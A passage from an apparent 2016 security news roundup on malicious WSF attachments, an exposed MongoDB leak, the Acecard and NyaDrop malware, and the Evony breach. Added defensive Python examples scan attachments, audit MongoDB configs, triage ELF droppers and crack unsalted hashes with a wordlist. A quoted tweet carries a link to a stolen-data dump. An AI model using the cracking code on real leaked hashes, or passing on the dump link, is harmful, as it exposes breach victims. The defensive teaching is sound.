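_SCRIPT_TAG = re.compile(rb'<script\s[^>]*language\s*=\s*["\']([^"\']+)["\']', re.I)


def script_extension(name: str) -> Optional[str]:
    """Return the scriptable extension of a file name, or None.
    Double extensions such as 'Itinerary.pdf.wsf' are judged by the LAST one,
    because that is the one Windows uses to choose the handler."""
    base = name.lower().rsplit("/", 1)[-1]
    dot = base.rfind(".")
    if dot == -1:
        return None
    ext = base[dot:]
    return ext if ext in SCRIPT_EXTENSIONS else None


def wsf_languages(data: bytes) -> List[str]:
    """Script engines named inside a WSF body, in order of appearance."""
    return [m.group(1).decode("latin-1") for m in _SCRIPT_TAG.finditer(data)]


def scan_attachment(filename: str, data: bytes) -> List[Dict[str, object]]:
    """One finding per scriptable file. Zip archives are opened in memory and
    walked recursively, so a .wsf hidden in a .zip (or a zip in a zip) is
    still caught; nothing is written to disk. 'container' records the
    innermost archive a hit was found in (None for a bare attachment)."""
    findings: List[Dict[str, object]] = []
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                # Production code would cap info.file_size here against zip bombs.
                for finding in scan_attachment(info.filename, zf.read(info)):
                    if finding["container"] is None:
                        finding["container"] = filename
                    findings.append(finding)
        return findings
    ext = script_extension(filename)
    if ext is not None:
        finding: Dict[str, object] = {"file": filename, "extension": ext, "container": None}
        if ext == ".wsf":
            finding["languages"] = wsf_languages(data)
        findings.append(finding)
    return findings


# Constructed, harmless WSF body with the mixed-language layout of a real one.
SAMPLE_WSF = b"""<job id="itinerary">
<script language="VBScript">
  Dim decoy : decoy = "constructed sample"
</script>
<script language="JScript">
  WScript.Echo("constructed sample, does nothing harmful");
</script>
</job>
"""


def build_sample_zip() -> bytes:
    """Constructed stand-in for the 'Travel Itinerary' attachment: a WSF with a
    decoy double extension plus an innocent text file, zipped."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Travel_Itinerary.pdf.wsf", SAMPLE_WSF)
        zf.writestr("readme.txt", b"nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_attachment("Travel Itinerary.zip", build_sample_zip()):
        print(hit)
```

The check deliberately keys on the last extension only: a gateway that matches on "contains .pdf" or on the MIME type of the zip is exactly what the double-extension trick defeats.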

Experts from Symantec believe that the use of .WSF files is part of a broader trend: the number of blocked emails containing this kind of malicious attachment has increased sharply over the last months, as shown in the graph in their post.

“From just over 22,000 in June, the figure shot up to more than 2 million in July. September was a record month, with more than 2.2 million emails blocked.” reads the post from Symantec.


Threat actors frequently adopt new tactics and change the format of the malicious attachments used in their campaigns in order to evade detection.

Crack for Charity — GCHQ launches 'Puzzle Book' Challenge for Cryptographers
16.10.2016 thehackernews BigBrothers

The UK's Signals Intelligence and Cyber Security agency GCHQ has launched its first ever puzzle book, challenging researchers and cryptographers to crack codes for charity.
Dubbed "The GCHQ Puzzle Book," the book features more than 140 pages of codes, puzzles, and challenges created by expert code breakers at the British intelligence agency.
Ranging from easy to complex, the GCHQ challenges include ciphers and tests of numeracy and literacy, substitution codes, along with picture and music challenges.
Writing in the GCHQ Puzzle Book's introduction, GCHQ Director Robert Hannigan says:
"For nearly one hundred years, the men and women of GCHQ, both civilian and military, have been solving problems. They have done so in pursuit of our mission to keep the United Kingdom safe. GCHQ has a proud history of valuing and supporting individuals who think differently; without them, we would be of little value to the country. Not all are geniuses or brilliant mathematicians or famous names, but each is valued for his or her contribution to our mission."
The idea for the GCHQ Puzzle Book came after the success of last year's cryptographic puzzle challenge that was dubbed the 'hardest puzzle in the world' and featured in Hannigan's Christmas card.
Nearly 600,000 people from across the globe took part in the challenge; only 30,000 reached the final stage, and three people who came very close were considered the winners by GCHQ.
The solution to the Christmas puzzle, including explanations from the puzzle-setters, was made publicly available early this year for anyone to look at.
The GCHQ Puzzle Book, published by Penguin Random House, will be on sale from 20th October at High Street book retailers and online.
All GCHQ earnings from the book will be donated to Heads Together — the "campaign spearheaded by the Duke and Duchess of Cambridge and Prince Harry, to tackle stigma, raise awareness and provide vital help for people with mental health challenges."

FBI is Investigating Theft of $1.3 Million in Bitcoin from a Massachusetts Man
16.10.2016 thehackernews Crime
Over two months ago, the world's third largest Bitcoin exchange, Bitfinex, lost around $72 million worth of Bitcoin in a major hack.
Shortly after the $72 million theft, an unnamed Bitfinex user from Cambridge, Massachusetts filed a police report in September alleging that $1.3 million had been stolen from his account.
Since then the Cambridge police have handed the case over to the FBI, which is working with the exchange as well as European authorities to recover the funds stolen from the Bitfinex user, Coindesk reports.
The individual claimed to have held $3.4 million in Bitcoin in his wallet hosted by Bitfinex. Following the August breach, he was left with $2.1 million in his account.
Bitfinex then notified the individual of his initial loss of approximately $1.3 million in Bitcoin; after the company issued IOU tokens as an emergency measure to keep the exchange operating, the loss was reduced to roughly $720,000.
The IOUs, or BFX tokens, were given to the victims as compensation to reduce their losses.
Although specific details remain unclear, the Bitfinex user confirmed losses beyond the BFX tokens issued to all victims of the breach.
How the tokens can actually be used is still unclear: Bitfinex's own explanation is vague, and the legal status of the tokens is unknown.
"The BFX tokens will remain outstanding until repaid in full by Bitfinex or exchanged for shares of iFinex Inc," explains the company. "The specific conditions associated with the exchange of these tokens will be explained in a later announcement."
The incident report filed by the Bitfinex user has been published online. No further details about the case are available at this moment.
Shortly after the breach of around $72 million worth of its customers' Bitcoins, the Hong Kong-based exchange announced a reward of $3.5 million to anyone who can provide information that leads to the recovery of the stolen Bitcoins.
The incident was so big that the price of Bitcoin dropped almost 20%, from $602.78 to $541 per Bitcoin, within a day of the announcement.

58M records dumped from an unsecured DB of Modern Business Solutions
16.10.2016 securityaffairs Crime

Hackers have leaked online over 58 million customer records from data storage firm Modern Business Systems, but the situation could be more severe.
58 million customer records have been leaked online by hackers; the huge trove of data appears to come from a data storage firm.

The records include personal information such as names, dates of birth, email and postal addresses, job titles, phone numbers, vehicle data, and IP addresses.

The archive appears to have been exfiltrated from an unsecured database belonging to Modern Business Solutions (MBS), a company that provides data storage and database hosting services.

I received a portion of the archive a few days ago from the hacker who uses the Twitter account @0x2Taylor. When the hacker sent me the archive, neither of us had any idea about its source.

The hacker released at least 58 million records stolen from MBS’s systems.

The tweet announcing the dump, posted by #BBK ~ $Taylor (@0x2Taylor) at 02:01 on 8 October 2016, read:

“Database Loaded : 52 Million Subscriber DB https://mega.nz/#!t9EyUapD!uOfzzH-SJOlYycdYTq8AKzdcBoR8R02kXvZ3naaL3Xs … Email,DOB,Name,Address,IP,Phone Number. #0x2Gang #DataDump”

Experts who analyzed the archive determined that it belongs to MBS, which was exposing an unsecured MongoDB database to the Internet.

“While the data itself is easy enough to read, identifying the owner of the database has been more challenging. Nothing within the dumped dataset itself pointed to who might be responsible for the information. Through additional investigation and subsequent exchanges with 0x2Taylor, researchers were able to obtain the IP address of the database.” reads a blog post published by Risk Based Security. “With that information, researchers were able to confirm it was an open MongoDB installation and identify the owner as Modern Business Solutions. Working with Databreaches.net, Modern Business Solutions was contacted and made aware of the issue. Although neither RBS or Databreaches.net have yet received a reply from Modern Business Solutions, the database has since been secured and is no longer accessible.”


The database includes data from companies that are customers of MBS; if you have had a business relationship with one of them, you can check for the presence of your data through the breach notification service “Have I Been Pwned?”.

Unfortunately, the situation is probably more severe: looking closely at the screenshot shared by the hacker, experts speculate that he had access to a database containing over 258 million rows of customer records.

This breach is only the latest in a long series related to misconfigured MongoDB databases.

In December 2015 the popular expert and Shodan creator John Matherly found over 650 terabytes of MongoDB data exposed on the Internet by unprotected databases.
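The breach above comes down to a mongod that listened on every interface and required no credentials, which was the default for MongoDB releases before 3.6 when the configuration said nothing about bindIp. The Python below is an added example (not Risk Based Security's or MBS's) that parses the small YAML subset mongod.conf uses, without any third-party library, and flags a configuration that is exposed and unauthenticated next to a corrected one; both configuration texts are constructed.

```python
"""Check a mongod.conf for the two settings behind the 'open MongoDB' dumps of
2015-2016: listening on every interface and running without access control.
Added example, not RBS's or MBS's code; the configuration texts below are
constructed. Only the YAML subset mongod.conf actually uses (nested mappings
with scalar leaves) is parsed, so no third-party YAML library is required."""
from typing import Dict, List, Tuple

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_simple_yaml(text: str) -> Dict[str, object]:
    """Indentation-based 'key: value' / 'key:' nesting only. Good enough for
    mongod.conf; not a general YAML parser (no lists, anchors or flow style)."""
    root: Dict[str, object] = {}
    stack: List[Tuple[int, Dict[str, object]]] = [(-1, root)]   # (indent, open mapping)
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        while indent <= stack[-1][0]:          # close sections we have dedented out of
            stack.pop()
        parent = stack[-1][1]
        value = value.strip()
        if value == "":                        # 'key:' opens a nested mapping
            child: Dict[str, object] = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value.strip("'\"")
    return root


def get(cfg: Dict[str, object], dotted: str, default=None):
    """Look up 'net.bindIp'-style paths in the parsed config."""
    node: object = cfg
    for part in dotted.split("."):
        if not isinstance(node, dict) or part not in node:
            return default
        node = node[part]
    return node


def audit_mongod(text: str, version: Tuple[int, int] = (3, 2)) -> List[str]:
    """Findings for an exposed or unauthenticated mongod. The release matters:
    before 3.6 an absent bindIp meant 'all interfaces', which is how most of
    the exposed instances of that period were configured."""
    cfg = parse_simple_yaml(text)
    findings: List[str] = []
    bind_ip = get(cfg, "net.bindIp")
    if str(get(cfg, "net.bindIpAll", "false")).lower() == "true":
        bind_ip = "0.0.0.0"
    if bind_ip is None:
        bind_ip = "127.0.0.1" if version >= (3, 6) else "0.0.0.0"
    addresses = {a.strip() for a in str(bind_ip).split(",")}
    if not addresses <= LOOPBACK:
        findings.append(f"net.bindIp={bind_ip}: listening on non-loopback interfaces")
    if get(cfg, "security.authorization", "disabled") != "enabled":
        findings.append("security.authorization is not 'enabled': anyone who can reach "
                        "the port can read and modify every database")
    return findings


# Constructed: the kind of config behind an 'open MongoDB' finding. Nothing
# under 'security', and the daemon is bound to every interface.
EXPOSED_CONF = """storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0
"""

# Constructed: the same server, corrected. Loopback-only binding is not enough
# when the application tier is on another host, so authorization is enabled too.
HARDENED_CONF = """storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1,::1
security:
  authorization: enabled
"""

if __name__ == "__main__":
    for name, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod(conf) or ["ok"])
```

Run against a real deployment, the check is the file-side complement of what Shodan and RBS did from the network side: a port 27017 that answers an unauthenticated query is exactly what the first finding predicts.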

Android Acecard banking trojan asks users for selfie with an ID card
16.10.2016 securityaffairs Android

Experts discovered a new variant of the Android Acecard banking trojan that asks victims to take a selfie while they are holding an ID card.
Criminals’ inventiveness knows no limits. Recently, a number of organizations have announced new authentication methods based on selfies: HSBC customers can open new bank accounts using a selfie, for example, as can customers of the Bank of Scotland, Mastercard and many other financial organizations.

Crooks have already started taking advantage of this new method of biometric authentication. Experts at McAfee discovered a new variant of the Android banking Trojan Acecard that pretends to be an adult video app or a codec/plug-in needed to watch a specific video.

“Recently the McAfee Labs Mobile Research Team found a new variant of the well-known Android banking Trojan Acecard (aka Torec, due to the use of Tor to communicate with the control server) that goes far beyond just asking for financial information.” reads a blog post published by McAfee. “In addition to requesting credit card information and second-factor authentication, the malicious application asks for a selfie with your identity document—very useful for a cybercriminal to confirm a victim’s identity and access not only to banking accounts, but probably also even social networks.”

The fake video plugin appears as an Adobe Flash Player update, a pornographic app, or a video codec.

While running in the background, the Acecard banking Trojan monitors the launch of specific apps usually associated with payment transactions. When the victim opens one of them, the malware displays a phishing overlay pretending to be Google Play that asks for the credit card number and then for further personal and financial data (cardholder name, date of birth, phone number, card expiration date and CVV).

After collecting credit card and personal information from the victim, the Trojan asks the victim to complete a fake “identity confirmation” consisting of three steps. In the first two steps the app requests a clean and readable photo of the front and back of the victim’s identity document (national ID, passport or driver’s license).


In the final step, the malicious app asks the victim to take a selfie while holding the ID card.

“After collecting credit card and personal information from the victim, the malware offers a fake “identity confirmation” that consists of three steps. The first two steps ask the user to upload a clean and readable photo of the front and back side of the victim’s identity document (national ID, passport, driver’s license).” continues the post. “The final step asks for a selfie with the identity document.”

The information collected by the Acecard banking Trojan allows attackers to carry out a range of fraudulent activities that amount to full identity theft of the victim.

According to the experts, this variant of the Acecard banking Trojan has affected users in Singapore and Hong Kong.
As usual, let me suggest avoiding downloads from untrusted app stores and carefully reviewing the permissions apps ask for, and of course never taking a selfie while holding your ID card.

Android Banking Trojan Tricks Victims into Submitting Selfie Holding their ID Card
15.10.2016 thehackernews Android
While some payment card companies like Mastercard have switched to selfies as an alternative to passwords when verifying identities for online payments, hackers have already started taking advantage of this new verification method.
Researchers have discovered a new Android banking Trojan that masquerades primarily as a video plugin, like Adobe Flash Player, pornographic app, or video codec, and asks victims to send a selfie holding their ID card, according to a blog post published by McAfee.
The Trojan is the most recent version of Acecard that has been labeled as one of the most dangerous Android banking Trojans known today, according to Kaspersky Lab Anti-malware Research Team.
Once installed, the trojan asks the user for a number of device permissions needed to run its malicious code, then waits for the victim to open apps, specifically those in which a request for payment card information would look plausible.
Acecard Steals your Payment Card and Real ID details
The banking trojan then overlays itself on top of the legitimate app and asks the user for the payment card number and card details such as the cardholder's name, expiration date, and CVV number.
"It displays its own window over the legitimate app, asking for your credit card details," explains McAfee researcher Bruce Snell. "After validating the card number, it goes on to ask for additional information such as the 4-digit number on the back."
Once this is done, the trojan looks to obtain the user's personal information, including name, date of birth and mailing address, for "verification purposes," and even requests photos of the front and back of their ID card.
After this, the Trojan prompts the user to hold the ID card under their face and take a selfie.
Hackers can make illegal Transfers and Take Over your Online Accounts
All these pieces of information are more than enough for an attacker to pass the verification steps for fraudulent banking transactions and to take over the victim's social media accounts by "confirming" the stolen identity.
So far this version of Acecard Android banking Trojan has impacted users in Singapore and Hong Kong.
This social engineering trick is obviously not new, and any tech-savvy user would quickly recognise the malicious behavior, since there is no reason for Google to ask for your ID card. But the trick still works on less technical users.
Since all of these fake apps have been distributed outside of Google Play Store, users are strongly advised to avoid downloading and installing apps from untrusted sources. Besides this, users should pay attention to the permissions apps are asking for.
Most importantly: No app needs a photo of you holding your ID card except perhaps a mobile banking service. So, always be cautious before doing that.

Exclusive – ELF Linux/NyaDrop, a new IoT threat in the wild
15.10.2016 securityaffairs Virus

Exclusive: an interview with @unixfreaxjp of MalwareMustDie for Security Affairs about Linux/NyaDrop, with the latest details on this new and dangerous IoT malware.
After the Krebs DDoS attack, the enrollment of new IoT botnets is set to grow, and new large “zombie armies” made of web IP cameras, DVRs/NVRs and routers/modems are invading cyberspace.

The evidence comes from the discovery of a new, undetected malware codenamed NyaDrop by the same security researcher who discovered and reverse engineered the now famous Mirai: MalwareMustDie!

As MalwareMustDie reports in the research published yesterday on his blog, NyaDrop, like most IoT malware emerging today, relies on an initial brute-force attack in which it tries the default credentials of the device. We have to remember that web IP cameras, DVRs/NVRs and routers/modems are often deployed without changing the default credentials.

Once NyaDrop succeeds in connecting to the IoT device over Telnet, it infects the system by dropping (downloading) the real malicious payload onto the host; this is why the initial NyaDrop component is such a small executable file.

Figure 1: strings contained in the binary code of NyaDrop

Not many strings can be extracted from the NyaDrop binary other than “nyABa”, from which the codename “Nya” derives. This string is nonetheless “a good way to grep for the easy filtration or one of the conditions in filtering this malware version for the mitigation purpose / signature.”

But let’s give a look to the binary code of the malware.

“If you see the size, we are dealing with a small executable file. It’s a clean libc-compiled ELF, coded in C in the form we often see in shellcodes. The insides are filled with MIPS opcodes. We dealt with similar small ELF malware before in the following posts here [link] and here [link]; I will try to deal with this one too :)”

Figure 2: The NyaDrop ELF

Small, yes? But it is amazing to see what this small malicious ELF can do.

In the MalwareMustDie analysis, the expert confirms that NyaDrop will then try to connect from the infected device to the C&C host in order to download the Nya trojan, but only if the IoT device uses a “MIPS CPU architecture, implying routers and similar networking devices, with 32bit clock.”

MIPS-based CPUs are often found in devices such as routers, DVRs, CCTV cameras and other embedded systems, as mentioned above.

So this malware is very selective about its environment, which means the NyaDrop author did not want to attack every IoT platform; on the contrary, he wanted to avoid infecting “useless” devices, targeting the best devices with the most bandwidth and avoiding dropping the precious binary on incompatible systems where it could not be executed.
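To triage a sample like the one described (a tiny, hand-trimmed ELF that only makes sense on MIPS and carries the "nyABa" string), it is enough to read the 52-byte ELF32 header and grep for the marker. The Python below is an added example, not MalwareMustDie's tooling: it decodes the header fields that matter (class, byte order, machine, number of section headers), combines them with the file size and the marker into a verdict, and can be pointed at any file. The "sample" it analyses is a constructed ELF32 header plus filler bytes, not a real NyaDrop binary, and the 1024-byte "tiny" threshold is this example's own heuristic.

```python
"""Triage a suspected IoT dropper the way the NyaDrop analysis describes it:
read the ELF32 header for the target CPU, note the tiny size and the absence
of section headers, and grep for the 'nyABa' marker. Added example, not
MalwareMustDie's code; build_sample_elf() produces a constructed header with
filler, not a real NyaDrop binary."""
import struct
from typing import Dict, List

EM_386, EM_MIPS, EM_ARM = 3, 8, 40          # e_machine values from the ELF spec
MACHINE_NAMES = {EM_386: "x86", EM_MIPS: "MIPS", EM_ARM: "ARM"}
NYADROP_MARKER = b"nyABa"                   # the one usable string found in the dropper
TINY_ELF_LIMIT = 1024                       # NyaDrop is 621 bytes; this example's heuristic


def parse_elf_header(data: bytes) -> Dict[str, object]:
    """Decode the ELF32 header fields needed for triage.
    Raises ValueError if the blob is not a 32-bit ELF."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class != 1:
        raise ValueError("only ELF32 is handled here")
    endian = ">" if ei_data == 2 else "<"   # EI_DATA: 1 = little-endian, 2 = big-endian
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    e_entry, e_phoff, e_shoff = struct.unpack(endian + "III", data[24:36])
    e_phnum, e_shentsize, e_shnum = struct.unpack(endian + "HHH", data[44:50])
    return {
        "endian": "big" if ei_data == 2 else "little",
        "type": {1: "REL", 2: "EXEC", 3: "DYN"}.get(e_type, str(e_type)),
        "machine": MACHINE_NAMES.get(e_machine, f"unknown({e_machine})"),
        "entry": e_entry,
        "phnum": e_phnum,
        "shnum": e_shnum,                   # 0 is typical of hand-trimmed ELFs
    }


def triage(data: bytes) -> Dict[str, object]:
    """Combine header facts, size and the string marker into a verdict."""
    hdr = parse_elf_header(data)
    reasons: List[str] = []
    if hdr["machine"] == "MIPS":
        reasons.append("MIPS target (routers, DVRs, cameras)")
    if len(data) <= TINY_ELF_LIMIT:
        reasons.append(f"tiny static ELF ({len(data)} bytes)")
    if hdr["shnum"] == 0:
        reasons.append("no section headers (stripped to the minimum)")
    has_marker = NYADROP_MARKER in data
    if has_marker:
        reasons.append("contains 'nyABa' marker")
    # The marker alone is a signature; the other three together describe the
    # class of tiny hand-written droppers the analysis refers to.
    suspicious = has_marker or len(reasons) >= 3
    return {"header": hdr, "size": len(data), "reasons": reasons, "suspicious": suspicious}


def build_sample_elf(machine: int = EM_MIPS, payload: bytes = NYADROP_MARKER) -> bytes:
    """Constructed big-endian ELF32 EXEC header, one program header and a few
    filler bytes around `payload`. It is not executable and contains no code."""
    e_ident = b"\x7fELF" + bytes([1, 2, 1, 0]) + b"\x00" * 8     # ELF32, MSB, version 1
    header = e_ident + struct.pack(
        ">HHIIIIIHHHHHH",
        2,                  # e_type = EXEC
        machine,            # e_machine
        1,                  # e_version
        0x00400000 + 84,    # e_entry, right after the two headers
        52,                 # e_phoff
        0,                  # e_shoff: no section header table
        0,                  # e_flags
        52, 32, 1,          # e_ehsize, e_phentsize, e_phnum
        0, 0, 0,            # e_shentsize, e_shnum, e_shstrndx
    )
    # One PT_LOAD program header (p_type, p_offset, p_vaddr, p_paddr, p_filesz,
    # p_memsz, p_flags=R+X, p_align).
    phdr = struct.pack(">IIIIIIII", 1, 0, 0x00400000, 0x00400000, 0, 0, 5, 0x1000)
    return header + phdr + b"\x00" * 16 + payload + b"\x00" * 8


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    print(triage(blob))
```

Pointing the script at a real file gives the same facts `file(1)` prints plus the size and marker checks; the header parse is what tells you, before any emulation, whether a sample will even run on the box you are looking at.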

The interview with @unixfreaxjp from MalwareMustDie, exclusive for Security Affairs, about Linux/NyaDrop

But let’s go to the interview with MalwareMustDie.

Q: What makes the sighting of NyaDrop so low, even though some may have seen the attacks/efforts to infect?

A: We can summarize those key points:

The actor really checks the target; he aims only at desirable types of hardware and does not bother to infect environments that do not match.
He makes sure to delete the “nya” when attempting to inject a new NyaDrop, so it is also not impossible that after a new “nya” is installed it will delete NyaDrop too. That way no one knows or has a sample.
Many people ask for more samples; it is very hard to get a real working one without getting cut off in the middle of the infection. Luckily I know many tricks in shells.
Q: Why do you think he is targeting the MIPS architecture in your case? How much effort did the herder make for the infection of that architecture?

A: I am not sure why, but obviously, next to ARM, MIPS devices are plentiful on the internet, especially networking boxes such as gateways, routers, switches, modems etc. He made a hard effort to make the binary as small as possible with a limited buffer size; you can see it in the reversing part I made. The total binary size is 621 bytes, with complete functionality using syscalls (socket, connect, recv, open, write, close). NyaDrop was designed as a backdoor, to be a pwn tool for routers.

Q: How effective do you think it is to use Telnet to inject/install NyaDrop on the targeted machine?

A: Only if you know a Telnet flaw of the device or a hardcoded password would one aim at this sector. In this season we have about 2 million devices with Telnet running on the internet, so the effectiveness of aiming at this protocol to gain shell privileges is fairly high. The way the coder injects the binary using echo commands is not smart and can raise the risk of breaking some shells when handling that data; this is also why the number of successfully injected binaries spotted is low.

Sorry, but I am not going to suggest the best way to do this.

Q: You mentioned it was originated in Russia, why?

A: Seeing the way it is coded & compiled, it is good; it trimmed the ELF down to the minimum running state… it is very hard to imagine that the skiddies we know have such knowledge.

I investigated the source IP used more deeply; such a connection would not be easily contracted by westerners.

Q: Do you think it is a new concept to infect IoT using a dropper/injector backdoor like Linux/NyaDrop?

A: For malware in general the concept is not new; for IoT it is new, since IoT was never targeted as hard as it is now. But I have seen many types of socket connect()/back_connect() ELF dropped server-side plenty of times; during the Shellshock era we had tons of these. The concept is not new at all.

In fact, I know exactly what, where and how to look when this type starts to hit IoT.

About the Author: Odisseus

Independent security researcher, active in Italy and worldwide on topics related to hacking, penetration testing and development.

Security experts released an anti-reconnaissance tool dubbed NetCease
15.10.2016 securityaffairs Security

Two Microsoft security researchers have released a new tool, dubbed NetCease, designed to make reconnaissance harder for attackers.
The tool hampers the reconnaissance activities attackers carry out inside a compromised Windows network.

The NetCease tool was developed by two researchers of the Microsoft Advanced Threat Analytics (ATA) research team, Itai Grady and Tal Be’ery.

The security experts will present the tool at Black Hat Europe, where they will explore the concept of “offensive cyber defense” methods.

The application is not classified as an official Microsoft tool, but it has been made available on Microsoft’s TechNet Gallery under the default license terms for “Software on Documentation Portals.”

Reconnaissance is a critical phase of an attack: attackers gather information about potential targets, identifying target machines, potential pivot points for lateral movement and privileged users.

Once inside the network, an attacker can use the NetSessionEnum function to retrieve information about the sessions established on domain controllers (DCs) or other servers in the network.

NetSessionEnum reveals, for each session, the name or IP address of the connecting device, the username that established the session and the duration of the session.

This data is essential for attackers seeking to move laterally within the victim’s network, since it reveals from which machines privileged users are connecting.

By default, any authenticated domain user is permitted to call NetSessionEnum remotely. Access to the method can be hardened by manually editing the permissions stored in a registry key (the SrvsvcSessionInfo security descriptor under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity). NetCease is a PowerShell script that rewrites those permissions so that ordinary remote callers are no longer allowed to invoke NetSessionEnum.

“Net Cease tool is a short PowerShell (PS) script which alters Net Session Enumeration (NetSessionEnum) default permissions. This hardening process prevents attackers from easily getting some valuable recon information to move laterally within their victim’s network,” reads the NetCease description.

“The NetCease script hardens the access to the NetSessionEnum method by removing the execute permission for Authenticated Users group and adding permissions for interactive, service and batch logon sessions,” the experts explained. “This will allow any administrator, system operator and power user to remotely call this method, and any interactive/service/batch logon session to call it locally.”


NetCease is simple to use: administrators run the PowerShell script with administrative privileges on the machine they need to harden (e.g. a Domain Controller), then restart it so the change takes effect.

33 million records exposed after the Evony data breach
14.10.2016 securityaffairs Crime

The website and the forum of the Evony gaming company were hacked this summer and as a result the data of 33 million of its gamers has been compromised.
Data on more than 33 million accounts of the Evony gaming company were stolen in a data breach that occurred in June. Evony is the company that developed the popular game Evony: Age II, which is played by more than 18 million gamers in over 167 countries. Hackers breached the website of the Evony gaming firm, accessing 33,407,472 records of registered user accounts.

Two months later, in August, the company was breached again; this time hackers compromised the Evony forum, exposing data on 938,000 registered accounts.

The data breach notification service LeakedSource obtained a copy of the huge archive and published a detailed analysis of the leaked data.

“Gaming company Evony was hacked for a total of 33,407,472 users from its main game database in June of 2016. Earlier this year in August we discovered their forums were also hacked for 938k users.” states a blog post published by the company.

“Each record contains a username, email address, password, and ip address among other internal data fields. Users can now get notified any time they appear in a breach. If your personal information appears in our copy of this database, or in any other leaked database that we possess, you may remove yourself for free.”

Each record includes username, email address, password, and IP address, along with other internal data. The passwords were stored as unsalted MD5 and SHA-1 (Secure Hash Algorithm 1) hashes, which means it is quite easy for attackers to crack them: without a salt, a single precomputed table of common passwords matches every account that used one of them.

“Passwords were stored using unsalted MD5 hashing which means at this point we have cracked most of them. Surprisingly they also stored the passwords in unsalted SHA1 next to the MD5 which makes no sense but anyway” continues the post.


123456 was the most used password on the gaming site, a demonstration that users have a low perception of cyber threats and lack awareness of a proper security posture online.
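The reason unsalted MD5 (or SHA-1) lets LeakedSource crack "most" of 33 million passwords is that one hash computation per candidate word tests every account at once, and every user who chose 123456 shows up with the same hash value. The Python below is an added example, not LeakedSource's tooling: it runs a short wordlist against constructed records stored Evony-style (unsalted MD5 next to unsalted SHA-1) and contrasts that with a salted, iterated PBKDF2-HMAC-SHA256 store in which identical passwords hash differently and each guess costs the attacker a full derivation. The leaked records and wordlist are constructed; the hash values in them are the real digests of the passwords noted in the comments.

```python
"""Why unsalted MD5/SHA-1 password stores fall in seconds, and what a salted,
slow KDF changes. Added example, not LeakedSource's code; LEAKED_RECORDS is a
constructed stand-in for the Evony dump, with real digests of weak passwords."""
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# Constructed records in the dump's layout: (user, unsalted MD5, unsalted SHA-1).
LEAKED_RECORDS: List[Tuple[str, str, str]] = [
    ("alice", "e10adc3949ba59abbe56e057f20f883e", "7c4a8d09ca3762af61e59520943dc26494f8941b"),  # 123456
    ("bob",   "e10adc3949ba59abbe56e057f20f883e", "7c4a8d09ca3762af61e59520943dc26494f8941b"),  # 123456 again: identical hash
    ("carol", "5f4dcc3b5aa765d61d8327deb882cf99", "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"),  # password
    ("dave",  "0123456789abcdef0123456789abcdef", "0123456789abcdef0123456789abcdef01234567"),  # not in the wordlist
]

# The head of any real wordlist; "123456" was Evony's most common password.
WORDLIST = ["123456", "password", "12345678", "qwerty", "evony"]

PBKDF2_ITERATIONS = 200_000     # work factor; raise it as hardware gets faster


def crack_unsalted(records: List[Tuple[str, str, str]], wordlist: List[str]) -> Dict[str, str]:
    """Hash each candidate ONCE and look every record up in the result.
    Cost is O(len(wordlist)) no matter how many users there are, and users who
    share a password are exposed together because their hashes are identical."""
    md5_table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    sha1_table = {hashlib.sha1(w.encode()).hexdigest(): w for w in wordlist}
    cracked: Dict[str, str] = {}
    for user, md5_hex, sha1_hex in records:
        # Either column cracks the account; storing both only doubles the exposure.
        guess = md5_table.get(md5_hex.lower()) or sha1_table.get(sha1_hex.lower())
        if guess is not None:
            cracked[user] = guess
    return cracked


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> Tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256. A random 16-byte salt per user means no
    shared table works, and the iteration count makes each guess expensive."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes,
                    iterations: int = PBKDF2_ITERATIONS) -> bool:
    """Recompute with the stored salt; compare in constant time."""
    return hmac.compare_digest(hash_password(password, salt, iterations)[1], digest)


def same_password_hashes_differ(password: str) -> bool:
    """Two users choosing the same password get two different stored values."""
    _, first = hash_password(password)
    _, second = hash_password(password)
    return first != second


if __name__ == "__main__":
    print("cracked:", crack_unsalted(LEAKED_RECORDS, WORDLIST))
    print("salted store hides shared passwords:", same_password_hashes_differ("123456"))
```

The cracked set falls out of a five-word list in one pass; with a salted, iterated store the attacker would have to run the 200,000-round derivation separately for every (user, guess) pair, and alice and bob would no longer be visibly linked.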

A look at the top email domains reveals that @yahoo.com was the most popular, followed by @hotmail.com.


At the time of writing it is not clear whether Evony has alerted its registered users.

12-Year-Old SSH Bug Exposes More than 2 Million IoT Devices
14.10.2016 thehackernews Vulnerebility
Are your internet-connected devices spying on you? Perhaps.
We already know that Internet of Things (IoT) devices are so badly secured that hackers are adding them to their botnets for launching Distributed Denial of Service (DDoS) attacks against targeted services.
But these connected devices are not limited to conducting DDoS attacks; they have far more potential to harm you.
New research [PDF] published by the content delivery network provider Akamai Technologies shows how unknown threat actors are using a 12-year-old weakness in OpenSSH's default configuration to secretly take control of millions of connected devices.
